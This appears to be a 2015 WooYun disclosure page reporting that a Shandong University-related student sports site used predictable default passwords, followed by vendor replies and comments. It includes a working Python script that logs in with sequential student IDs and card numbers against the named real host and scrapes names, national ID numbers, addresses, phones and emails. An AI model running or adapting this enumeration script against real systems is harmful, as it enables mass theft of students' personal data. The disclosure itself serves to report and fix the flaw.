当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0161854

漏洞标题:山东大学某主站默认学生使用弱口令密码导致身份信息泄漏

相关厂商:山东大学

漏洞作者: 方大核桃

提交时间:2015-12-16 16:48

修复时间:2016-01-28 17:10

公开时间:2016-01-28 17:10

漏洞类型:成功的入侵事件

危害等级:低

自评Rank:1

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-16: 细节已通知厂商并且等待厂商处理中
2015-12-17: 厂商已经确认,细节仅向厂商公开
2015-12-27: 细节向核心白帽子及相关领域专家公开
2016-01-06: 细节向普通白帽子公开
2016-01-16: 细节向实习白帽子公开
2016-01-28: 细节向公众公开

简要描述:

帐号为校园卡学号
默认使用校园卡帐号登录
so~~规律就来了

详细说明:

==问题描述==
帐号为校园卡学号
默认使用校园卡帐号登录
so~~规律就来了
如某人的校园卡帐号是2014xxxx1812 校园卡帐号是233233
然后一测试,就会发现使用帐号2014xxxx1813 校园卡帐号233234也能登录
里面的信息还是比较多的哈

描述.jpg


然后,利用身份证号码可以去这个网站的重置密码...

QQ截图20151216160916.png


QQ截图20151216160945.png


ps:重置密码的界面真漂亮........
于是,我们就登录了

描述2.jpg


抱着要好好学习的心态.我又来了遍python

# -*- coding: utf-8 -*-
import urllib
import urllib2
import cookielib
import re
username = 201418130116
password = 243383
ct = 0
for j in range(1,1000):
cookie = cookielib.CookieJar()
handler = urllib2.HTTPCookieProcessor(cookie)
opener = urllib2.build_opener(handler)
values = {"username":username,"password":password}
data = urllib.urlencode(values)
url = "http://schoolsports.infosport.com.cn/Login.aspx"
request = urllib2.Request(url,data)
response = opener.open(request)
# next is use the cookie post a page
# and 搞出里面需要的信息
# next is 构造变量 批量访问之!
my_url = "http://schoolsports.infosport.com.cn/StudentInfo.aspx"
req = urllib2.Request(my_url)
response = opener.open(req)
#print response.read()
content = response.read().decode('utf-8')
# pattern = re.compile('<input id="IDCard" name="IDCard" type="text" value="(.*?)" class="txt"/></td>')
# items = re.findall(pattern,content)
pattern1 = re.compile('<input id="Text1" name="name" readonly="readonly" type="text" value="(.*?)" class="txt" /></td>')
item = re.findall(pattern1,content)
if not item:
ct+=1
print "no fake passwd"
if ct==10:
print "此学号段宣布over"
break
username+=1
password+=1
continue
ct = 0
print "学号:",username,
print "校园卡帐号",password,
print "姓名:",item[0],
pattern2 = re.compile('<input id="Text2" name="sex" readonly="readonly" type="text" value="(.*?)" class="txt"/></td>')
item = re.findall(pattern2,content)
print "性别:",item[0],
pattern = re.compile('<input id="IDCard" name="IDCard" type="text" value="(.*?)" class="txt"/></td>')
item = re.findall(pattern,content)
print "身份证号码:",item[0],
pattern = re.compile('<input id="Address" name="Address" type="text" value="(.*?)" class="txt" /></td>')
item = re.findall(pattern,content)
print "地区",item[0],
pattern = re.compile('<input id="Mobile" name="Mobile" type="text" value="(.*?)" class="txt"/></td>')
item = re.findall(pattern,content)
print "手机号",item[0],
pattern = re.compile('<input id="EMail" name="EMail" type="text" value="(.*?)" class="txt"/></td>')
item = re.findall(pattern,content)
print "电子邮箱",item[0],
print ""
# items2 = re.findall(pattern2,content)
# for i in items2:
# print i[0],i[1],
username+=1
password+=1
print "Over, Have A Good Day"


漏洞证明:

<img src="

你看呀.png

" alt="" />

修复方案:

由于涉及到学生的身份证,户籍地等信息,建议强制用户更改初始密码..

版权声明:转载请注明来源 方大核桃@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-12-17 16:21

厂商回复:

已通报系统所属单位

最新状态:

暂无


漏洞评价:

评价

  1. 2016-01-18 01:43 | 廷廷 ( 路人 | Rank:0 漏洞数:1 | 有很强的好奇心,爱好广泛,求女女带走。。...)

    是正方啵

  2. 2016-01-18 09:41 | 方大核桃 ( 实习白帽子 | Rank:53 漏洞数:9 | 山东某高校学生)

    @廷廷 并不是

  3. 2016-01-19 06:15 | 山东大学(乌云厂商)

    不是,是个不太出名的公司。我也是刚知道,体育学院搞得,系统不在校内。

  4. 2016-01-19 06:17 | 山东大学(乌云厂商)

    @方大核桃 你是山大计算机学院的吗?我是万林,是山大信息办的,也是计算机学院毕业的(好吧,那会还叫山东工业大学)。

  5. 2016-01-19 08:27 | 方大核桃 ( 实习白帽子 | Rank:53 漏洞数:9 | 山东某高校学生)

    @山东大学 你好你好你好!你是不是在学校的数据库里面用了一条select语句要查我水表.....怎么知道我是计算机学院的吓得我赶快买好了明天的火车票~~明天放假了!祝寒假快乐!讲真...我那挂了的两科还有机会转60么....

  6. 2016-01-19 09:50 | 山东大学(乌云厂商)

  7. 2016-01-19 10:19 | 方大核桃 ( 实习白帽子 | Rank:53 漏洞数:9 | 山东某高校学生)

    有机会我要再进一次 : -)

  8. 2016-01-19 17:59 | 山东大学(乌云厂商)

    @方大核桃 没问题,你不搞的问题大了,没有大爷们关心你,也没有人关心这些事情

  9. 2016-01-19 18:00 | 山东大学(乌云厂商)

    @方大核桃 即便是挂10科也一样

  10. 2016-02-16 15:41 | 坏男孩-A_A ( 实习白帽子 | Rank:37 漏洞数:16 | 膜拜学习中)

    @方大核桃 @山东大学 精彩的对话(*_*)